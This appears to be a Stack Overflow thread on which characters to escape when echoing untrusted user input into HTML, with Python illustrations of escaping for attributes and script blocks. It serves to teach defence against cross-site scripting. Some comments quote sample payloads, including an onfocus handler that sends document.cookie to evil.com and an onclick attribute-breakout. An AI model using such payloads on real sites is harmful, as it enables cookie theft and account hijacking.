What are the characters that are required and suffice when escaping user-generated content before output? (in other words: what are the characters web developers should escape when outputting text that previously came from an untrusted, anonymous source?)

+4  A: 

When echoing to a page, you should encode

  • '&' (ampersand) becomes '&amp;'
  • '"' (double quote) becomes '&quot;'
  • ''' (single quote) becomes '&#039;'
  • '<' (less than) becomes '&lt;'
  • '>' (greater than) becomes '&gt;'

From PHP's htmlspecialchars() docs.
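As a rough illustration outside PHP, Python's standard `html.escape` performs the same five replacements when `quote=True`. It emits `&#x27;` for the single quote where the PHP docs list `&#039;`; both are numeric references to the same character. The sample string is made up for the example.

```python
import html

# Hypothetical untrusted input containing all five special characters.
untrusted = """<b onclick='x'>Tom & "Jerry"</b>"""

# quote=True also escapes " and ', which matters inside attribute values.
escaped = html.escape(untrusted, quote=True)
print(escaped)
```

This covers HTML text and quoted attribute values only; other contexts need other rules.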

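Note that the output context also matters: text placed in an attribute value, a script block, or CSS is not covered by the same rules as text in the page body.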

You'll also need to take the character set into account.

alex
What's the reason and/or need to escape quotes?
ChrisW
In case the text goes into an <input> tag, where it's placed in the value attribute, enclosed in quotes.
Alexander
@ChrisW I echo your name here `<input name="name" value="<?php echo $name; ?>">`. Now what if I entered my name as `alex" onfocus="window.location = 'http://www.evil.com/steal.php?cookie=' + encodeURI(document.cookie)`
alex
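The attack in the comment above can be reproduced in a few lines. This is a sketch in Python rather than PHP; `render_input_unsafe` and `render_input` are hypothetical helpers that stand in for the `echo $name` template.

```python
import html

def render_input_unsafe(name: str) -> str:
    # Mirrors the template from the comment: the value is pasted in verbatim.
    return f'<input name="name" value="{name}">'

def render_input(name: str) -> str:
    # Escaping quotes keeps the whole payload inside the value attribute.
    return f'<input name="name" value="{html.escape(name, quote=True)}">'

payload = (
    "alex\" onfocus=\"window.location = "
    "'http://www.evil.com/steal.php?cookie=' + encodeURI(document.cookie)"
)

print(render_input_unsafe(payload))  # the payload's quote closes value and adds onfocus
print(render_input(payload))         # quotes arrive as &quot; and &#x27;
```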
Thanks for your reply.
ChrisW
I also recommend escaping anything that is not [a-zA-Z0-9]. Browsers will render the escaped characters properly, and it does not take much effort to implement.
Pedro Laguna
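One way to read that suggestion is to turn every character outside [a-zA-Z0-9] into a decimal numeric character reference. The sketch below assumes that interpretation; `escape_non_alnum` is a hypothetical name, and the approach still only applies to HTML text and attribute values.

```python
import html
import re

def escape_non_alnum(text: str) -> str:
    # Replace each character outside [a-zA-Z0-9] with &#NNN; (its code point).
    return re.sub(r"[^a-zA-Z0-9]", lambda m: f"&#{ord(m.group())};", text)

sample = 'a"b<c'
encoded = escape_non_alnum(sample)
print(encoded)
# A browser decodes the references back to the original characters for display.
print(html.unescape(encoded) == sample)
```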
@Pedro Laguna - If you mean for accented letters, etc., why not serve it as UTF-8?
ChrisW
@ChrisW no, I mean : ; , . / \ + = _ - # ! etc. You never know what the bad guys are going to discover to execute Javascript ;)
Pedro Laguna
@Pedro You mean you never know how IE can be tricked into executing JavaScript... I mean have you seen how the Samy worm was made? http://namb.la/popular/tech.html
alex
This answer is not what I wanted nor what I expected, but it is the most insightful one because it made me realize that the question is incomplete. Thank you, @alex
Tom
@alex yes, I read (and understood) the Samy code and the java\nscript trick. But other tricks can be discovered in other browsers too: http://sla.ckers.org/forum/read.php?24,33938,page=1
Pedro Laguna
@Pedro I know, I was just having a joke at IE's expense :D
alex
There are more characters; it all depends on where in the page the input is displayed. For example, if it is displayed inside a script block (<script></script>) or in CSS, you have to worry about other characters. Check this link (Why Can't I Just HTML Entity Encode Untrusted Data?): http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
fms
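To make the script-block case concrete, here is a minimal sketch of one common approach: serialize the value as a JSON string literal, then replace `<`, `>` and `&` with `\uXXXX` escapes so the text cannot close the script element. `js_string_literal` is a hypothetical helper, not something taken from the linked cheat sheet.

```python
import json

def js_string_literal(value: str) -> str:
    # json.dumps quotes the string and escapes ", \ and control characters;
    # with the default ensure_ascii=True, non-ASCII becomes \uXXXX as well.
    literal = json.dumps(value)
    # Hide characters that are meaningful to the HTML parser around the script.
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))

payload = "</script><script>alert(1)</script>"
literal = js_string_literal(payload)
print(f"<script>var name = {literal};</script>")
```

The JavaScript engine decodes the `\uXXXX` escapes, so the variable still holds the original text.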
@Pedro Wow, tested a few of them in my console and they are working with Firefox 3.6.3. Scary stuff... thanks for the link.
alex
A: 

I think that escaping the < > & " ' symbols should be enough for any scenario.

Alexander
These characters are not enough in some scenarios. Imagine the following code: <input type="text" value="asdf\" onclick=alert(document.domain); a=\""> Simply escaping the double quotes does not help you :)
Pedro Laguna
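The markup in that comment can be checked with Python's standard `html.parser`. This is only a sketch: Python's parser is not a browser, and `AttrCollector` and `attribute_names` are hypothetical helpers. It compares prefixing quotes with a backslash against entity-encoding them.

```python
import html
from html.parser import HTMLParser

class AttrCollector(HTMLParser):
    """Records the attribute names of every start tag it sees."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)

def attribute_names(markup: str) -> list:
    parser = AttrCollector()
    parser.feed(markup)
    parser.close()
    return parser.names

payload = 'asdf" onclick=alert(document.domain); a="'

# Backslash-escaping: HTML does not treat \ as an escape character.
backslashed = '<input type="text" value="' + payload.replace('"', '\\"') + '">'
# Entity-encoding: the quotes never reach the parser as delimiters.
entity_encoded = '<input type="text" value="' + html.escape(payload, quote=True) + '">'

print(attribute_names(backslashed))     # includes an onclick attribute
print(attribute_names(entity_encoded))  # only type and value
```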
oh, yes, of course, I forgot the backslash. That's about it then :).
Alexander
A: 

Maybe this will help you

http://www.theukwebdesigncompany.com/articles/entity-escape-characters.php

hex
Thanks, but that is a complete list. I don't want to escape everything, I want to escape as little as possible/needed.
Tom
